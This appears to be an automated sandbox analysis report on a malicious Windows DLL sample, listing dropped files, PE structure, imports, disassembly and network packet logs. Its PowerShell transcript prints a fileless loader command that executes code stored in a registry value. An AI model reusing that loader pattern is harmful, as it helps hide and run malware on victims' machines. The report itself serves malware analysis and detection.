                                                                                SHA-512:EA5752E1B5A77D3867A1E29DB5F0776716E7722B7E5ACD052FBDFE6AA9EA188A3A02811AA6DBD3999209C567A5A7B3ACB2E3AFDD7B4DDBAB66367E726939DB23
                                                                                Malicious:false
                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\~DFEAB8398C79AF2049.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):192720
                                                                                Entropy (8bit):3.1291712184396374
                                                                                Encrypted:false
                                                                                SSDEEP:3072:1Z/2BfcYmu5kLTzGtLZ/2Bfc/mu5kLTzGt:8a
                                                                                MD5:A37BC84025C19043BF6C889CB9AB181F
                                                                                SHA1:94C912B48FD9AC2F2C1F715AA9B6AFEF1AE77764
                                                                                SHA-256:6549B581F622B35E39619F99E6B9C6D236021990D128972784411D3026B51EAD
                                                                                SHA-512:EA66276CE564DE075A65B34731D2B320958B32453FDA90ABC8A437A8B8F954A57B6D0517E6B40A6D7136B037C556EF721B7F8C2991CA697344AD2C54225AB1A6
                                                                                Malicious:false
                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H55P40337A8ZEK5DH4O4.temp
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):5149
                                                                                Entropy (8bit):3.1765133368694243
                                                                                Encrypted:false
                                                                                SSDEEP:96:tPTPQPm9SXAJreTPQP73SXAnRTPQPt9SXAf:Zot
                                                                                MD5:0AAE345F0DDA122968BF980E55B6A678
                                                                                SHA1:28C51C53B2E9A316C965C5676503804998C5839F
                                                                                SHA-256:46638A09011BBCC255A431C056D29A25B41E32765AC940D28BDBB158082DE111
                                                                                SHA-512:6B74178B76D5EADCB56E7E15273EC6185D2BC8701F779E78807F2FBEDDB5CBFA0B532C1DF9B7CEE6E45FA48F30CF788BE4E4C197CFE5FADF52A13B9AD5D794CD
                                                                                Malicious:false
                                                                                Preview: ...................................FL..................F.@.. .....@.>...R..Q......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.<..PROGRA~1..t......L.>Q.<....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.OR/...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JOR/......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............:.O.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}
                                                                                Process:C:\Windows\explorer.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):57
                                                                                Entropy (8bit):4.143546527102675
                                                                                Encrypted:false
                                                                                SSDEEP:3:KIVMcxHVFXVR3AQEHlTEHFZF3:KIe2HF73
                                                                                MD5:9D4197DE2A8E54AF8708C4763C0A9CB2
                                                                                SHA1:8D34C1B5090C5C75DA80060E5F4005042B62003E
                                                                                SHA-256:4BF42ADDF077899E5B2F4782EF4507996D3533828D3E213785C1E4157D0BB83A
                                                                                SHA-512:014632B8E260F7A158853682BD13BE15BDE441B00B1762A00B882353E996D2B8C218F74E654C25CD85BB1C45AE58A16784819EDF1A93B159A4A8143994E02440
                                                                                Malicious:false
                                                                                Preview: 16-02-2021 00:59:08 | "0xb204e7e0_6005be7372c1a" | 4306..
                                                                                C:\Users\user\Documents\20210216\PowerShell_transcript.124406.8rVYw17M.20210216005826.txt
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1189
                                                                                Entropy (8bit):5.311506804336808
                                                                                Encrypted:false
                                                                                SSDEEP:24:BxSAbi7vBZFx2DOXUWOLCHGIYBtLW1HjeTKKjX4CIym1ZJXYOLCHGIYBt0nxSAZp:BZbYvjFoORF/1qDYB1ZuFXZZp
                                                                                MD5:53DDEDFF54B863A791D3EC6D82CD0E83
                                                                                SHA1:CCECE7BDE4A0C98F8E428ED6FEF05545B815FC40
                                                                                SHA-256:5E147647DF4CE61B7C5D938E804AEFA6261E86F8FD97EDADDCA4241C3ECDC480
                                                                                SHA-512:0F8B0B2AD2845B24F9AF352E87BE3032A49F0CC3C3DD9DD18C3A2FA6A6AFC3FF19E6870D51E1D57E11FF91718B7BB7E95AE01EB6591438AEA6B45FCC8C40C617
                                                                                Malicious:false
                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210216005827..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5424..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210216005827..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.790714264316921
                                                                                TrID:
                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
                                                                                File size:360448
                                                                                MD5:f76b81b0397ae313b8f6d19d95c49edf
                                                                                SHA1:8f15106b524cc5db564845508a04ee3bf2709949
                                                                                SHA256:3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a
                                                                                SHA512:d473bb6f8ae26418dffe3e9acaf6266e305c012b2fb57d5e82c8ffbc4c9cae6f1a4e496d5f3bdf0b7228964862a392f552b5847370331d8ad5fea9be7f3af9a6
                                                                                SSDEEP:6144:b87Sm49lFRQSAe5klIQm3n/ym1grjpY7nf9+v3lYdkv+hgG2xnG4c/gU:fm+3QSAdm3n/yogZgwv3Gqv0gG2tG4gv
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6.&.X.&.X.&.X..F%.>.X..F6...X..F5...X./...#.X.&.Y.I.X..F*.'.X..F".'.X..F$.'.X..F .'.X.Rich&.X.........PE..L...y..E...........

                                                                                File Icon

                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x100285d5
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x10000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                DLL Characteristics:
                                                                                Time Stamp:0x45B6F579 [Wed Jan 24 05:58:17 2007 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:e0e710d4ed87ec11636d345dba071187

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                cmp dword ptr [esp+08h], 01h
                                                                                jne 00007FACDCACCC57h
                                                                                call 00007FACDCAD5A00h
                                                                                push dword ptr [esp+04h]
                                                                                mov ecx, dword ptr [esp+10h]
                                                                                mov edx, dword ptr [esp+0Ch]
                                                                                call 00007FACDCACCB42h
                                                                                pop ecx
                                                                                retn 000Ch
                                                                                mov eax, dword ptr [esp+04h]
                                                                                xor ecx, ecx
                                                                                cmp eax, dword ptr [100503A0h+ecx*8]
                                                                                je 00007FACDCACCC64h
                                                                                inc ecx
                                                                                cmp ecx, 2Dh
                                                                                jl 00007FACDCACCC43h
                                                                                lea ecx, dword ptr [eax-13h]
                                                                                cmp ecx, 11h
                                                                                jnbe 00007FACDCACCC5Eh
                                                                                push 0000000Dh
                                                                                pop eax
                                                                                ret
                                                                                mov eax, dword ptr [100503A4h+ecx*8]
                                                                                ret
                                                                                add eax, FFFFFF44h
                                                                                push 0000000Eh
                                                                                pop ecx
                                                                                cmp ecx, eax
                                                                                sbb eax, eax
                                                                                and eax, ecx
                                                                                add eax, 08h
                                                                                ret
                                                                                call 00007FACDCAD3448h
                                                                                test eax, eax
                                                                                jne 00007FACDCACCC58h
                                                                                mov eax, 10050508h
                                                                                ret
                                                                                add eax, 08h
                                                                                ret
                                                                                call 00007FACDCAD3435h
                                                                                test eax, eax
                                                                                jne 00007FACDCACCC58h
                                                                                mov eax, 1005050Ch
                                                                                ret
                                                                                add eax, 0Ch
                                                                                ret
                                                                                push esi
                                                                                call 00007FACDCACCC3Ch
                                                                                mov ecx, dword ptr [esp+08h]
                                                                                push ecx
                                                                                mov dword ptr [eax], ecx
                                                                                call 00007FACDCACCBE2h
                                                                                pop ecx
                                                                                mov esi, eax
                                                                                call 00007FACDCACCC15h
                                                                                mov dword ptr [eax], esi
                                                                                pop esi
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 48h
                                                                                mov eax, dword ptr [10050514h]
                                                                                xor eax, ebp
                                                                                mov dword ptr [ebp-04h], eax
                                                                                push ebx
                                                                                xor ebx, ebx
                                                                                push esi
                                                                                mov esi, dword ptr [ebp+08h]
                                                                                cmp dword ptr [esi+14h], ebx
                                                                                push edi
                                                                                mov dword ptr [ebp-2Ch], ebx
                                                                                mov dword ptr [ebp-24h], ebx
                                                                                mov dword ptr [ebp-1Ch], ebx
                                                                                mov dword ptr [ebp-28h], ebx

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [RES] VS2005 build 50727
                                                                                • [ C ] VS2005 build 50727
                                                                                • [EXP] VS2005 build 50727
                                                                                • [C++] VS2005 build 50727
                                                                                • [ASM] VS2005 build 50727
                                                                                • [LNK] VS2005 build 50727
                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x4f0200x93.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4e7540x3c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb10000x4d0.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000x1c98.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3e2200x1c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4cc280x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x3e0000x1b4.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x3c44c0x3d000False0.709148469518data6.87914572387IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x3e0000x110b30x12000False0.671644422743data6.3835832451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x500000x604c80x4000False0.558715820312COM executable for DOS5.48871661926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xb10000x4d00x1000False0.150146484375data1.65729733757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xb20000x2c740x3000False0.485595703125data4.83368153083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_VERSION0xb10a00x2b0dataEnglishUnited States
                                                                                RT_MANIFEST0xb13500x17dXML 1.0 document textEnglishUnited States

                                                                                Imports

                                                                                DLLImport
                                                                                KERNEL32.dllExitProcess, GetFileAttributesA, CreateProcessA, GetSystemDirectoryA, GetEnvironmentVariableA, MultiByteToWideChar, GetShortPathNameA, CopyFileA, GetTempFileNameA, LoadLibraryA, WaitForMultipleObjects, GetModuleFileNameA, VirtualProtect, GetCurrentProcessId, CompareStringW, CompareStringA, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCommandLineA, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, RaiseException, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, HeapSize, GetUserDefaultLCID, SetEnvironmentVariableA
                                                                                WS2_32.dllioctlsocket, inet_ntoa, WSAStartup, recvfrom, ntohl, inet_addr, htons, WSACleanup, recv, socket, getservbyname, send, getsockopt, listen

                                                                                Exports

                                                                                NameOrdinalAddress
                                                                                DllRegisterServer10x10021230
                                                                                Exactnature20x10021130
                                                                                Happenthousand30x100215a0
                                                                                Probablepath40x10021650

                                                                                Version Infos

                                                                                DescriptionData
                                                                                LegalCopyrightCopyright Strongimagine 1996-2016
                                                                                FileVersion8.3.8.121
                                                                                CompanyNameStrongimagine
                                                                                ProductNameRoom know
                                                                                ProductVersion8.3.8.121 Soundbank
                                                                                FileDescriptionRoom know
                                                                                OriginalFilenameSing.dll
                                                                                Translation0x0409 0x04e4

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                02/16/21-00:58:10.168631ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 16, 2021 00:57:34.691473007 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.711564064 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.742607117 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.742716074 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.757204056 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.762904882 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.763009071 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.791100025 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.810581923 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.812463045 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.812472105 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.812580109 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.836986065 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.840151072 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.840368986 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.842098951 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.844362974 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.844383001 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.844460964 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.844490051 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.888045073 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.888201952 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.888247967 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.888289928 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.888334036 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.891134977 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.891165972 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.891232967 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.901031971 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.901072025 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.901124001 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.901169062 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.904736996 CET49746443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.918406963 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.919996023 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.969549894 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.969671011 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.969683886 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.969769955 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.969788074 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.970529079 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.971085072 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.971318960 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:34.971410036 CET49747443192.168.2.4104.20.184.68
                                                                                Feb 16, 2021 00:57:34.995932102 CET44349746104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:35.064992905 CET44349747104.20.184.68192.168.2.4
                                                                                Feb 16, 2021 00:57:39.482304096 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.482346058 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.482587099 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.482667923 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.482676983 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.482687950 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.527659893 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.527690887 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.527786970 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.527810097 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.528208017 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.528247118 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.528274059 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.528316975 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.528342009 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.528389931 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.528392076 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.528409004 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.532202959 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.537482977 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.538105011 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.538821936 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.556309938 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.556982040 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.577560902 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.578695059 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.578738928 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.578768969 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.578773975 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.578792095 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.578829050 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.583000898 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.583566904 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584065914 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584101915 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584134102 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584135056 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.584153891 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.584160089 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584183931 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.584602118 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584639072 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584670067 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.584671021 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.584681988 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.584836960 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.585165024 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.585203886 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.585233927 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.585247040 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.585264921 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.585298061 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.592503071 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.592982054 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593256950 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593384981 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593516111 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593636036 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593755007 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593873024 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.593986034 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.594113111 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.594228029 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.599705935 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.600497961 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.600881100 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.601010084 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.601056099 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.601067066 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.601103067 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.601131916 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.601713896 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.601756096 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.601790905 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.601860046 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.601913929 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.601929903 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.605763912 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.606708050 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.609092951 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.609481096 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.622344017 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.622720003 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.623044014 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.623564005 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.624207973 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.624552011 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.636313915 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.636363983 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.636467934 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.636504889 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.636754990 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.636961937 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.637196064 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.637202024 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.637506008 CET44349764151.101.1.44192.168.2.4
